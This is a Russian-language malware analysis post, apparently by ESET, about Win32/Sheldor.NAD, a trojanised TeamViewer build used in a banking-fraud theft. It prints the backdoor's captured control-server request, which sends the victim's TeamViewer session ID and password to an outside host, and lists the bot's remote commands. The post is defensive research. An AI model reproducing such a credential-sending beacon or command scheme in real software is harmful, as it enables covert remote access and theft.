Недавно аналитики ESET обнаружили интересную вредоносную программу – Win32/Sheldor.NAD, которая является модификацией популярного ПО для удаленного администрирования компьютера – TeamViewer.

Данные сведения были получены при проведении экспертизы в рамках расследования инцидента, инициированного Group-IB и связанного с мошенничеством в системах ДБО. При этом злоумышленники умудрились провести несколько поддельных транзакций и похитить около 5 миллионов рублей.

Win32/Sheldor.NAD – устанавливается посредством троянской программы-инсталлятора, которая внедряет в систему модифицированную версию популярного пакета для удаленного администрирования — TeamViewer пятой версии. Причем многие компоненты содержат легальную цифровую подпись:



Так как, по сути, в этой модифицированной версии все изменения содержатся в модуле tv.dll, когда мы обнаружили этот backdoor, большинство антивирусных решений его просто не замечало, поскольку без непосредственного анализа кода определить, что это вредоносная программа, было не так просто.



Сейчас дела обстоят куда лучше — http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1295272165.

Сразу после установки вредоносной программы происходит запуск серверной части и далее осуществляется непрерывная взаимосвязь с административной панелью злоумышленников, которые могут в любой момент подключиться к зараженному компьютеру и выполнять любые действия с привилегиями пользователя, под учетной записью которого была запущена вредоносная программа или же наблюдать за ним.



Информационный обмен между админкой и зараженной машиной в основном заключается в следующем:

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1
User-Agent: x3
Host: goeiuyi.net

где поле id=414 034 883 является идентификатором сессии в сети TeamViewer, а pwd=6655 — соответственно паролем. Обладая этими двумя идентификаторами, вы можете беспрепятственно подключаться к удаленному компьютеру из любой точки мира. Назад бот может получать следующие команды из центра управления:

exec — вызывает функцию winapi ShellExecute()
power_off – вызывает функцию winapi ExitWindowsEx() с параметром EWX_POWEROFF
shutdown — вызывает функцию winapi ExitWindowsEx()с параметром EWX_SHUTDOWN
killbot – удаляет все установленные файлы и зачищает созданные ключи реестра



Выбор злоумышленников был сделан не случайно именно на программе TeamViewer, так как она достаточно популярна у системных администраторов, и заподозрить подвох можно не сразу. Кроме того, подключение к удаленному компьютеру осуществляется через серверы-посредники для TeamViewer, что позволяет злоумышленникам скрыть свой IP-адрес, с которого реализуется подключение. Это также оставляет меньше улик для проведения расследования, так как запросить необходимые данные у компании-разработчика программы TeamViewer процедура достаточно небыстрая и может затянуться на несколько месяцев.